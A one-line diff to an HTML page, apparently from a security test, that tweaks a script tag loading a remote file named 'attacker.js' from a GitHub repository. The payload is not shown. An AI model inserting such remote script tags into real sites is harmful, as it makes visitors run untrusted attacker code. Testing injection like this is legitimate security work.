--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript" src="https://raw.githubusercontent.com/sathyatesting001/web/main/attacker.js"></script>
+<script src="https://raw.githubusercontent.com/sathyatesting001/web/main/attacker.js"></script>
